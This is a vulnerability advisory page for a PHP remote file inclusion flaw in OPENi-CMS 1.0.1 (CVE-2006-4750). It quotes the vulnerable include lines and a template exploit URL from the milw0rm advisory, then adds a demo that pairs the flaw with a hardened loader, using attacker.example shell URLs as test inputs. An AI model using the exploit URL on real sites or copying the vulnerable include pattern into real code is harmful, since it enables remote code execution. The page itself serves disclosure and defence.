OPENi-CMS 'fileloader.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID 1111000 Vulnerability type Input validation
Published 2006-09-11 Updated 2006-09-18
CVE ID CVE-2006-4750 CNNVD ID CNNVD-200609-237
Platform PHP CVSS score 5.1
|Source
https://www.exploit-db.com/exploits/2344
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-237
|Details
A PHP remote file inclusion vulnerability exists in openi-admin/base/fileloader.php in OPENi-CMS 1.0.1 and possibly earlier versions. A remote attacker can execute arbitrary PHP code via a URL in the config[openi_dir] parameter. The script builds its include paths from $config["openi_dir"] before assigning it, so the request parameter reaches include_once() only where PHP's register_globals is enabled, and the remote fetch additionally requires allow_url_fopen (and, from PHP 5.2, allow_url_include). Disabling either setting blocks the remote variant; the underlying defect, an include path taken from an uninitialized variable, remains until the code is fixed.
|Exploit
Update:
22:44 09/11/06

Subject:
"OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability "

Vulnerable version:
OPENi-CMS 1.0.1

Operating System:
- All OS

Vendor URL:
Support - support@openi-cms.org
Website - http://www.openi-cms.org/

Description:
OPENi-CMS is a PHP content management system with a WYSIWYG editor,
plugins and user management, making it easy to arrange content as well as
different website styles.


Vulnerability:
Invalid include function in fileloader.php on lines 5, 6 and 7: the
'$config["openi_dir"]' value is not guaranteed (validated) before it is used
to include files.

// openi-admin/base/fileloader.php (PHP, lines 5-7)
// $config["openi_dir"] has not been assigned by this script when these
// includes run; with register_globals on, a request parameter named
// config[openi_dir] supplies it, so the include path is attacker-controlled.

include_once($config["openi_dir"]."/base/constants.php");    // invalid code
include_once($config["openi_dir"]."/base/db_classes.php");   // invalid code
include_once($config["openi_dir"]."/base/site_classes.php"); // invalid code

Exploit:
http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]

Solution:
Upgrade to the next version.

Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / www.xcrime-cyber.pro.tc

# milw0rm.com [2006-09-11]
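The following is an added example written for this page; it is not OPENi-CMS code and not part of the milw0rm advisory. It repeats the include pattern quoted above in vulnerable_loader() and places a hardened loader beside it: the base directory is derived from a trusted install root rather than from anything that register_globals may have written into $config, and it is canonicalised and checked before it reaches include_once(). The function names, the OPENI_CONSTANTS_LOADED marker and the throwaway install tree in the temp directory are assumptions made for the demo.

```php
<?php
// Added example for this page; not OPENi-CMS code. The first function repeats
// the include pattern quoted in the advisory, the rest is a hardened loader.
// Names (vulnerable_loader, resolve_openi_dir, safe_loader), the
// OPENI_CONSTANTS_LOADED marker and the throwaway install tree are assumptions.

// Vulnerable pattern: $config['openi_dir'] is read before this script has set
// it. With register_globals=On, a request such as
//   fileloader.php?config[openi_dir]=http://attacker.example/x
// populates $config['openi_dir'] from the query string, and with remote
// includes enabled (allow_url_fopen; allow_url_include from PHP 5.2) the
// include_once() fetches and executes the attacker's file.
function vulnerable_loader(array $config)
{
    include_once $config['openi_dir'] . '/base/constants.php';
}

// Hardened resolver: given a candidate base directory (from a config file or
// the script's own location, never from the request), return its canonical
// on-disk path, or false if it carries a URL/stream scheme, contains a NUL
// byte, does not exist, or resolves outside $install_root.
function resolve_openi_dir($candidate, $install_root)
{
    if (!is_string($candidate) || strpos($candidate, "\0") !== false) {
        return false;
    }
    // Two or more scheme characters before ':' rejects http://, ftp://, php://,
    // data: and friends while still allowing a Windows drive letter like C:\.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $candidate)) {
        return false;
    }
    $root = realpath($install_root);
    $real = realpath($candidate);
    if ($root === false || $real === false) {
        return false;
    }
    // $real must be $root itself or a path below it. The prefix check runs on
    // the canonical form, so ../ segments and symlinks have already been resolved.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $root && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $real;
}

// Hardened loader: builds $config locally from a trusted root, so whatever
// register_globals injected into a variable named $config is never consulted.
function safe_loader($install_root)
{
    $config = array('openi_dir' => resolve_openi_dir($install_root, $install_root));
    if ($config['openi_dir'] === false) {
        // Caller must abort; nothing is included from an untrusted location.
        return false;
    }
    include_once $config['openi_dir'] . '/base/constants.php';
    return defined('OPENI_CONSTANTS_LOADED');
}

// Self-contained demo on a constructed install tree in the temp directory.
$root = sys_get_temp_dir() . '/openi_demo_' . getmypid();
mkdir($root . '/base', 0700, true);
file_put_contents($root . '/base/constants.php',
    "<?php define('OPENI_CONSTANTS_LOADED', true);\n");

$cases = array(
    'URL from the advisory exploit' => 'http://attacker.example/shell.txt?',
    'php:// stream wrapper'         => 'php://input',
    'traversal above the root'      => $root . '/../',
    'the real install root'         => $root,
);
foreach ($cases as $label => $candidate) {
    $result = resolve_openi_dir($candidate, $root);
    printf("%-30s -> %s\n", $label, $result === false ? 'rejected' : 'accepted: ' . $result);
}
printf("safe_loader loaded constants.php: %s\n", safe_loader($root) ? 'yes' : 'no');

// Clean up the constructed tree.
unlink($root . '/base/constants.php');
rmdir($root . '/base');
rmdir($root);
```

Run it with the PHP CLI; the three hostile candidates are rejected before any include is attempted and only the real install root is accepted. The scheme regex is defence in depth: realpath() already returns false for http:// and php:// strings, but rejecting them explicitly keeps the loader safe if someone later replaces realpath() with a weaker normalisation.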
|References

Source: XF
Name: openicms-fileloader-file-include(28859)
Link: http://xforce.iss.net/xforce/xfdb/28859
Source: BID
Name: 19952
Link: http://www.securityfocus.com/bid/19952
Source: MILW0RM
Name: 2344
Link: http://www.milw0rm.com/exploits/2344
Source: VUPEN
Name: ADV-2006-3556
Link: http://www.frsirt.com/english/advisories/2006/3556
Source: SECUNIA
Name: 21874
Link: http://secunia.com/advisories/21874
Source: MISC
Link: http://bb.domaindlx.com/bingung/shellcore/advisories.asp?bug_report=display&infamous_group=103